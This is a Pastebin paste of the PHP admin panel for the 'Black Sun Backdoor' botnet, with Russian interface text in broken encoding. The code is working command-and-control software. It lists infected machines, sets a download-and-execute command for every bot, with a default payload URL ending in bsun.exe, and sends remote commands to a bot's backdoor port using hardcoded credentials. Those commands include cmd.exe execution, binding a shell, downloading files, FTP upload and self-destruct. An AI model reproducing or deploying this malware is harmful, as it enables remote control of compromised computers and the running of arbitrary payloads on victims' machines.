Advertisement
FlyFar

web/admin.php

May 27th, 2024
919
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.74 KB | Cybersecurity | 0 0
  1. <?
  2. /*
  3.  *  ---------------------------------------------------------------------
  4.  *         ____  _            _     _____            
  5.  *        |  _ \| |          | |   / ____|            
  6.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
  7.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
  8.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
  9.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
  10.  *                 Black Sun Backdoor v1.0 prebeta        
  11.  *
  12.  *                          (x) Cytech 2007
  13.  *  ---------------------------------------------------------------------
  14.  */
  15. ?>
  16. <title> BlackSun Remote Control System </title>
  17.  
  18. <center><img src="images/logo.JPG"><br><br></center>
  19. <center>
  20. <table style="text-align: center; width: 959px; height: 32px; "border="0" cellpadding="0" cellspacing="0">
  21.   <tbody>
  22.     <tr>
  23.     <small>
  24.            <td><a href = "?act=connect"><img src="images/connect.jpg"><br>ïîäêëþ÷åíèå</a></td>
  25.            <td><a href = "?act=stat"><img src="images/statistic.jpg"><br>ñòàòèñòèêà</a></td>
  26.     </small>
  27.     </tr>
  28.   </tbody>
  29. </table>
  30. </center>
  31. <style>
  32. BODY {
  33.     color: #DDDDDD;
  34.     background-color: #000000;
  35.     scrollbar-face-color: #212121;
  36.     scrollbar-highlight-color: #404040;
  37.     scrollbar-shadow-color: #000000;
  38.     scrollbar-3dlight-color: #616161;
  39.     scrollbar-arrow-color:  #66E201;
  40.     scrollbar-track-color: #000000;
  41.     scrollbar-darkshadow-color: #000000;
  42. }
  43.  
  44. .a {
  45.     font-family: Verdana;
  46.     font-size: 12px;}
  47.  
  48. A {
  49.     color: #00AA00;
  50.     text-decoration: none;
  51. }
  52.  
  53. A:hover {
  54.     color: #FFFFFF;
  55.     text-decoration: none;
  56. }
  57.  
  58. TD {
  59.     font-family: Verdana;
  60.     font-size: 12px;
  61.     color: #DDDDDD;
  62. }
  63.  
  64. input  
  65. {
  66.     font-size: 10pt;font-family: Arial;
  67.     color: #999930;
  68.     background-color: #000000;
  69.     border-color:#666666 #666666 #666666 #666666;
  70.     border-width:1pt 1pt 1pt 1pt;
  71.     border-style:dotted dotted dotted dotted;
  72.     padding-left: 2pt;
  73.     overflow:hidden;
  74. }
  75. select  
  76. {
  77.     font-size: 10pt;font-family: Arial;
  78.     color: #999930;
  79.     background-color: #000000;
  80.     border-color:#666666 #666666 #666666 #666666;
  81.     border-width:1pt 1pt 1pt 1pt;
  82.     border-style:dotted dotted dotted dotted;
  83.     padding-left: 2pt;
  84.     overflow:hidden;
  85. }
  86. </style>
  87. <font style="font-family: Verdana;"><small>
  88.  
  89. <?
  90.     /**********************************************************/
  91.     Error_Reporting(E_ALL & ~E_NOTICE);
  92.     /**********************************************************/
  93.      include("conf.php");  
  94.     /**********************************************************/
  95.    
  96.     function SendCommand($host, $port, $givemecmd)
  97.     {          
  98.             $sock = fsockopen($host,$port,$errno,$errstr);
  99.             if (!$sock)                                  
  100.             {
  101.                 echo "cant connect to remote server!";
  102.             }
  103.             else
  104.             {
  105.                 fputs ($sock,$givemecmd);
  106.                 while (!feof($sock))
  107.                 {
  108.                   $ans = fgets($sock,999666);  
  109.                   echo(htmlspecialchars($ans));
  110.                 }
  111.             }
  112.             fclose ($sock);
  113.     }
  114.    
  115.     /**********************************************************/
  116.    
  117.     function ConnectMySQL($host, $login, $password, $database)
  118.     {
  119.             $connect=mysql_connect($host,$login,$password);
  120.            
  121.             if ($connect===FALSE)
  122.             {
  123.                 die('cant connect to database');
  124.             }
  125.            
  126.             $selectdb=mysql_select_db($database);
  127.            
  128.             if ($selectdb==FALSE)
  129.             {
  130.                 die('cant select database');
  131.             }
  132.     }
  133.    
  134.     /**********************************************************/
  135.    
  136.     function ShowBotnetTable($db_botable)
  137.     {
  138.         echo '<br><br><b>[ Ñòàòèñòèêà: ]</b><br><br>';
  139.         echo '<center>';
  140.         echo '<table style="text-align: left; width: 912px; height: 80px;" border="1" cellpadding="0"';
  141.         echo 'cellspacing="0"><tbody><tr>';
  142.         echo '<td><center>Èìÿ êîìïüþòåðà</center></td>';
  143.         echo '<td><center>Òåêóùàÿ HTTP-êîìàíäà</center></td>';
  144.         echo '<td><center>IP-àäðåñ</center></td>';
  145.         echo '<td><center>Backdoor-ïîðò</center></td>';
  146.         echo '<td><center>Ïîñëåäíåå ïîäêëþ÷åíèå</center></td>';
  147.         echo '<td><center>Äåéñòâèå</center></td>';
  148.         echo '</tr>';
  149.  
  150.         $res = mysql_query("SELECT * FROM $db_botable");
  151.         for ($i=0, $ROWS=mysql_num_rows($res); $i<$ROWS; $i++)
  152.         {
  153.              $row = mysql_fetch_assoc($res);
  154.              
  155.              echo '<tr>';
  156.                  foreach ($row as $key => $value)
  157.                  {
  158.                     if($key=="id") continue;
  159.                         #echo "<td>$value</td>";
  160.                         # äîáàâèòü ôèëüòðàöèþ!!!
  161.                         if($key=="uid")  
  162.                         {
  163.                             $uid = $value;
  164.                             echo "<td>$value</td>";
  165.                         }  
  166.                         if($key=="cmd")
  167.                         {
  168.                             $cmd=str_replace(""," ", $value); echo "<td>$cmd</td>";
  169.                         }
  170.                         if($key=="data")
  171.                         {
  172.                             $ip = $value;
  173.                             echo "<td>$ip</td>";
  174.                         }
  175.                         if($key=="port")
  176.                         {
  177.                             $port = $value;
  178.                             echo "<td>$port</td>";
  179.                         }
  180.                         if($key=="lconnection")
  181.                         {
  182.                             $lcon = $value;
  183.                             echo "<td>$lcon</td>";
  184.                         }
  185.                  }
  186.                         echo '<td><center><a href = "'; echo "?act=connect&ip=$ip&port=$port";
  187.                         echo '">ïîäêëþ÷èòüñÿ</a>';
  188.                        
  189.                         echo '<br><a href = "'; echo "?act=stat&bot=delete&uid=$uid";
  190.                         echo '">óäàëèòü</a></center></td>';
  191.              echo '</tr>';
  192.         }
  193.    
  194.         echo '</tbody></table></center>';
  195.     }
  196.  
  197.     /**********************************************************/
  198.  
  199.     function SetNewCommandForBots($db_botable)
  200.     {
  201.         echo '<br><br><b>[ Óñòàíîâèòü êîìàíäó áîòàì: ]</b><br><br>';
  202.         echo '<form action="" method="post">';
  203.         echo 'Ââåäèòå èìÿ áîòà (ñèìâîë "*" - âñåì áîòàì ñðàçó)<br>';
  204.         echo '<input name="botuid" size="10" value="*"><br>';
  205.     #   echo '<input name="newcmd" size="40" value="dexec_http://localhost/1.exe"><br>';
  206.     #   echo '<input name="set" value="óñòàíîâèòü" type="submit"><br><br>';
  207.  
  208.         echo 'Âûáåðèòå êîìàíäó äëÿ óñòàíîâêè<br>';
  209.         echo '<SELECT name=newcmd>';
  210.         echo '<OPTION value=dexec>Ñêà÷àòü è çàïóñòèòü ôàéë</OPTION>';
  211.         echo '<OPTION value=nocommand>Óáðàòü êîìàíäó</OPTION>';
  212.         echo '</SELECT><br>';
  213.        
  214.         echo 'Àðãóìåíò: <input name="arg1" size="50" value="http://nnp.0x48k.cc/load/bsun.exe"><br>';
  215.        
  216.         echo '<input name="set" value="óñòàíîâèòü" type="submit"><br><br>';
  217.         echo '</form>';
  218.        
  219.         $newcmd = htmlspecialchars(addslashes($_POST['newcmd']."".$_POST['arg1']));
  220.         $botuid = htmlspecialchars(addslashes($_POST['botuid']));
  221.        
  222.         if(!is_null($_POST['set'] && $_POST['botuid']))
  223.         {
  224.             if($botuid=="*")
  225.             {
  226.                 mysql_query("UPDATE $db_botable SET cmd='$newcmd'"); // óñòàíàâëèâàåì
  227.             }
  228.             else
  229.             {
  230.                 mysql_query("UPDATE $db_botable SET cmd='$newcmd' WHERE uid='$botuid'");
  231.             }
  232.         }
  233.     }
  234.     /**********************************************************/
  235.    
  236.     ConnectMySQL($db_host, $db_login, $db_password, $db_database);
  237.    
  238.     /**********************************************************/
  239.         # http://gate/admin.php?act=stat
  240.     if($_GET['act'] == "stat")
  241.     {
  242.  
  243.         ShowBotnetTable($db_botable);
  244.         SetNewCommandForBots($db_botable);
  245.  
  246.         # http://gate/admin.php?act=stat&bot=DELETE
  247.         if($_GET['bot'] == "delete")
  248.         {
  249.             $duid = htmlspecialchars(addslashes($_GET['uid']));
  250.        
  251.             echo "<b>âû äåéñòâèòåëüíî õîòèòå óäàëèòü $duid ?</b>";
  252.             echo '<form action="" method="post">';
  253.             echo '<input name="submit" value="äà" type="submit"><br><br>';
  254.             echo '</form><br><br>';
  255.            
  256.             if(!is_null($_POST['submit']))
  257.             {
  258.                 mysql_query("DELETE FROM $db_botable WHERE uid = '$duid'");
  259.                  echo "<br><a href = ?act=stat>íàæìèòå ñþäà, åñëè âàø áðàóçåð íå ïîääåðæèâàåò àâòîìàòè÷åñêîãî ðåäèðåêòà</a><br>";
  260.                 echo '<script>location="?act=stat";</script>';
  261.             }
  262.         }
  263.     }
  264.     /**********************************************************/
  265.         # http://gate/admin.php?act=connect
  266.     if($_GET['act'] == "connect")
  267.     {
  268.         if(is_null($_GET['connect']))
  269.         {
  270.                     $ip = htmlspecialchars(addslashes($_GET['ip']));
  271.                     $port = htmlspecialchars(addslashes($_GET['port']));
  272.  
  273.             echo '<center><br><br><b>[ Ïàðàìåòðû ïîäêëþ÷åíèÿ: ]</b><br>';
  274.             echo '<form action="" method="post">';
  275.             echo 'Õîñò: <input name="host" size="20" value="';
  276.                 if ($ip){ echo $ip; } else {echo '127.0.0.1';};
  277.             echo '"><br><br>';
  278.             echo 'Ïîðò: <input name="port" size="20" value="';
  279.                 if ($port){ echo $port; } else {echo '2121';};
  280.             echo '"><br><br>';
  281.             echo 'Ëîãèí: <input name="login" size="21" value="cytech"><br><br>';
  282.             echo 'Ïàðîëü: <input name="password" size="20" value="cytech"><br><br>';
  283.             echo '<input name="connect" value="Connect" type="submit"><br><br>';
  284.             echo '</form>';
  285.  
  286.                 if(!is_null($_POST['connect']))
  287.                 {
  288.                         $link = "?act=connect&connect=1&ip=".
  289.                                 htmlspecialchars(addslashes($_POST[host])).
  290.                                 "&port=".
  291.                                 htmlspecialchars(addslashes($_POST[port])).
  292.                                 "&login=".
  293.                                 htmlspecialchars(addslashes($_POST[login])).
  294.                                 "&password=".
  295.                                 htmlspecialchars(addslashes($_POST[password]));
  296.  
  297.                        
  298.                         echo "<br><a href = $link >íàæìèòå ñþäà, åñëè âàø áðàóçåð íå ïîääåðæèâàåò àâòîìàòè÷åñêîãî ðåäèðåêòà</a><br>";
  299.                         echo '<script>location="'.$link.'";</script>';
  300.                 }
  301.                 else
  302.                 {
  303.                         echo "<br>çàïîëíèòå âñå ïîëÿ ôîðìû<br>";
  304.                 }
  305.         }
  306.         # http://gate/admin.php?act=connect&connect=1
  307.         if($_GET['connect'] == "1")
  308.         {
  309.             echo '<form action="" method="post">';
  310.             echo '<br><br><b>[ Âûáåðèòå êîìàíäó äëÿ âûïîëíåíèÿ: ]</b>';
  311.             echo '<br><SELECT name=cmd>';
  312.             echo '<OPTION value=cmd>Âûïîëíåíèå êîìàíäû ÷åðåç cmd.exe [1]</OPTION>';
  313.             echo '<OPTION value=exec>Ñêðûòûé/âèäèìûé çàïóñê ïðèëîæåíèÿ ÷åðåç WinExec [2]</OPTION>';
  314.             echo '<OPTION value=bindshell>Çàáèíäèòü øåëë íà çàäàííîì ïîðòó [1]</OPTION>';
  315.             echo '<OPTION value=download>Ñêà÷àòü ôàéë ïî HTTP [2]</OPTION>';
  316.             echo '<OPTION value=ftp_upload>Çàêà÷àòü ôàéëà íà FTP [6]</OPTION>';
  317.             echo '<OPTION value=->----------------------------------------------</OPTION>';
  318.             echo '<OPTION value=msgbox>Âûâåñòè MessageBox [2]</OPTION>';
  319.             echo '<OPTION value=power>Ïèòàíèå (âûêëþ÷èòü/ïåðåçàãðóçèòü/ñïàòü/âñòàòü) [1]</OPTION>';
  320.             echo ' <OPTION value=monitor>Âêëþ÷èòü/âûêëþ÷èòü ìîíèòîð [1]</OPTION>';
  321.             echo '<OPTION value=cdrom>Îòêðûòü/çàêðûòü CD-ROM [1]</OPTION>';
  322.             echo '<OPTION value=keyboard>Ïåðåêëþ÷àòåëü ðåæèìîâ êëàâèàòóðû [1]</OPTION>';
  323.             echo '<OPTION value=mouse>Ïîìåíÿòü ìûøü íà ëåâøó/ïðàâøó [1]</OPTION>';
  324.             echo '<OPTION value=crazymouse>Ýôôåêò áåøåíîé ìûøè [2]</OPTION>';
  325.             echo '<OPTION value=funwindows>Ñïðÿòàòü/ïîêàçàòü îêíà [1]</OPTION>';
  326.             echo '<OPTION value=->----------------------------------------------</OPTION>';
  327.             echo '<OPTION value=version>Ïîëó÷èòü óñòàíîâëåííóþ âåðñèþ BlackSun [0]</OPTION>';
  328.             echo '<OPTION value=exitprocess>Çàêîí÷èòü ðàáîòó [0] </OPTION>';
  329.             echo ' <OPTION value=killmyself>Ñàìîóíè÷òîæèòüñÿ (íåîáõîäèì ëîãèí è ïàðîëü)</OPTION>';
  330.             echo '</SELECT>';
  331.             echo ' <br><br><br>';
  332.             echo ' Àðãóìåíò ¹1: <input name="arg1" size="50" value="netstat -an"><br>';
  333.             echo ' Àðãóìåíò ¹2: <input name="arg2" size="50" value="_"><br>';
  334.             echo ' Àðãóìåíò ¹3: <input name="arg3" size="50" value="_"><br>';
  335.             echo ' Àðãóìåíò ¹4: <input name="arg4" size="50" value="_"><br>';
  336.             echo ' Àðãóìåíò ¹5: <input name="arg5" size="50" value="_"><br>';
  337.             echo ' Àðãóìåíò ¹6: <input name="arg6" size="50" value="_"><br>';
  338.             echo ' <INPUT type="submit" name="submit" value="send command">';
  339.    
  340.            
  341.                     $login      =   $_GET['login'];
  342.                     $password   =   $_GET['password'];
  343.    
  344.                      $cmd  = $login.":".$password
  345.                             ."".$_POST['cmd']."".$_POST['arg1']."".$_POST['arg2']."".$_POST['arg3']
  346.                             ."".$_POST['arg4']."".$_POST['arg5']."".$_POST['arg6']."".$_POST['arg7'];
  347.                    
  348.                     echo '<br><br><b>[ Ðåçóëüòàò âûïîëíåíèÿ êîìàíäû: ]</b>';
  349.                     if(!is_null($_POST['submit']))
  350.                     {
  351.                         echo "</font><pre>";
  352.                         SendCommand($_GET['ip'], $_GET['port'], $cmd);
  353.                         echo "</pre>";
  354.                     }
  355.             }
  356.                
  357.     }
  358.     /**********************************************************/
  359.  ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement